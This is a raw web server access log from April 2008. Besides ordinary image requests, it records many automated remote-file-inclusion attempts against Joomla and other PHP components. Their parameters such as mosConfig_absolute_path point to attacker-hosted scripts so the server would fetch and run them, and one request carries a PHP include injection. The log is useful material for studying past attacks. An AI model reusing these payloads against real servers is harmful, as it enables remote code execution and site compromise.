71.98.233.223 - - [29/Apr/2008:09:38:01 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:03 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:03 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:09:38:03 -0700] "GET /logs/access_080321.log/zoodvd//index.php?option=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:09:38:03 -0700] "GET /logs/zoodvd//index.php?option=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:05 -0700] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:05 -0700] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:06 -0700] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:09 -0700] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:11 -0700] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:11 -0700] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:12 -0700] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:14 -0700] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.98.233.223 - - [29/Apr/2008:09:38:16 -0700] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:38:20 -0700] "GET /logs/access_080308.log/mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:38:42 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:38:50 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:38:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:38:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:39:14 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:09:39:17 -0700] "GET /logs/main.php?site=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:39:18 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:39:18 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:39:52 -0700] "GET /logs/index.php?option=com_portfol&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:39:56 -0700] "GET /index.php?option=com_portfol&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 200 11590 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:39:56 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:40:01 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:40:02 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:09:40:03 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:09:40:04 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:09:40:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:40:14 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:40:20 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:40:54 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.80.202.91 - - [29/Apr/2008:09:40:58 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [29/Apr/2008:09:40:58 -0700] "GET //components/com_calendar.php?absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [29/Apr/2008:09:40:59 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.108.195 - - [29/Apr/2008:09:41:02 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.directresa.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:41:08 -0700] "GET /logs/index.php?option=com_football_pool&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:41:12 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:41:12 -0700] "GET /index.php?option=com_football_pool&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:41:12 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:41:13 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.236.111.227 - - [29/Apr/2008:09:41:15 -0700] "GET /modules/xfsection/modify.php?dir_module=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.80.202.91 - - [29/Apr/2008:09:41:17 -0700] "GET //components/com_calendar.php?absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:41:39 -0700] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:41:40 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:42:36 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:42:37 -0700] "GET /logs/access_080321.log/zoodvd//index.php?option=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:42:37 -0700] "GET /zoodvd//index.php?option=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:42:38 -0700] "GET /logs/zoodvd//index.php?option=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.84.188.7 - - [29/Apr/2008:09:42:50 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:43:05 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:43:06 -0700] "GET /logs/access_080219.log/mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.236.111.227 - - [29/Apr/2008:09:43:20 -0700] "GET /logs/access_080126.log/modules/xfsection/modify.php?dir_module=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:43:24 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:43:25 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:44:16 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:44:17 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:44:17 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:44:25 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.61.4 - - [29/Apr/2008:09:44:28 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [29/Apr/2008:09:44:28 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:44:58 -0700] "GET /logs/index.php?option=com_joomlaxplorer&action=show_error&dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:45:02 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:45:42 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:45:42 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:45:42 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:45:57 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:45:57 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:45:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:46:05 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:46:07 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:46:14 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:46:17 -0700] "GET /logs/access_080321.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:46:21 -0700] "GET /?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:09:46:22 -0700] "GET /logs/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 45268 "-" "libwww-perl/5.65" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:09:46:23 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:09:46:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:09:46:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.172.8 - - [29/Apr/2008:09:46:25 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [29/Apr/2008:09:46:37 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [29/Apr/2008:09:46:42 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:46:59 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:09:47:03 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.25.168 - - [29/Apr/2008:09:47:19 -0700] "GET /logs/access_080207.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:47:25 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:47:26 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:47:26 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:47:35 -0700] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:47:41 -0700] "GET /logs/index.php?ort=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:47:45 -0700] "GET /index.php?ort=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:09:48:14 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:09:48:17 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:09:48:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:49:04 -0700] "GET /logs/index.php?ort=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:49:09 -0700] "GET /index.php?ort=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:09:49:40 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:09:49:42 -0700] "GET /logs/ONhttp://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:09:49:43 -0700] "GET /ONhttp://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:09:49:44 -0700] "GET /logs/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:09:49:47 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:09:49:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [29/Apr/2008:09:49:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:09:50:06 -0700] "GET /logs/access_080321.log/zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:09:50:06 -0700] "GET /zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Apr/2008:09:50:06 -0700] "GET /logs/zoodvd//index.php?option=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:50:07 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:50:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [29/Apr/2008:09:50:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:09:50:18 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:09:50:18 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
